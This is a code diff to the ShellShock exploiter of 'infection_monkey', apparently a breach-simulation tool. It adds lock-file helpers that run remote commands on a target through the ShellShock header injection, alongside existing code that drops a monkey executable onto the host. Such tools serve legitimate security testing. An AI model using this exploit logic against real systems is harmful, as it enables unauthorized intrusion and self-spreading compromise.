diff --git a/monkey/infection_monkey/exploit/shellshock.py b/monkey/infection_monkey/exploit/shellshock.py index 208af2f98..1880e6c07 100644 --- a/monkey/infection_monkey/exploit/shellshock.py +++ b/monkey/infection_monkey/exploit/shellshock.py @@ -108,6 +108,9 @@ class ShellShockExploiter(HostExploiter): LOG.info("Can't find suitable monkey executable for host %r", self.host) return False + if not self._try_lock(exploit, url, header): + continue + http_path, http_thread = HTTPTools.create_transfer(self.host, src_path) if not http_path: @@ -124,6 +127,8 @@ class ShellShockExploiter(HostExploiter): http_thread.join(DOWNLOAD_TIMEOUT) http_thread.stop() + self._exit_lock(exploit, url, header) + if (http_thread.downloads != 1) or ( 'ELF' not in self.check_remote_file_exists(url, header, exploit, dropper_target_path_linux)): LOG.debug("Exploiter %s failed, http download failed." % self.__class__.__name__) @@ -182,6 +187,31 @@ class ShellShockExploiter(HostExploiter): LOG.debug("URL %s does not seem to be vulnerable with %s header" % (url, header)) return False, + @classmethod + def _try_lock(cls, exploit, url, header): + """ + Checks if another monkey is running shellshock exploit + :return: True if no monkey is running shellshock exploit + """ + file_path = '/tmp/monkey_lock' + if cls.check_remote_file_exists(url, header, exploit, file_path): + LOG.info("Another monkey is running shellshock exploit") + return False + cmdline = 'touch /tmp/monkey_lock' + run_path = exploit + cmdline + cls.attack_page(url, header, run_path) + return True + + @classmethod + def _exit_lock(cls, exploit, url, header): + """ + Remove lock file from target machine + """ + file_path = '/tmp/monkey_lock' + cmdline = 'rm %s' % file_path + run_path = exploit + cmdline + cls.attack_page(url, header, run_path) + @staticmethod def attack_page(url, header, attack): result = ""